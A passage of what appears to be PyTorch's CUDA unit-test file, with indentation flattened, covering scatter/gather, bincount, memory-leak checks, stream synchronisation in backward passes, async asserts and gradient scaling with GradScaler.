"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
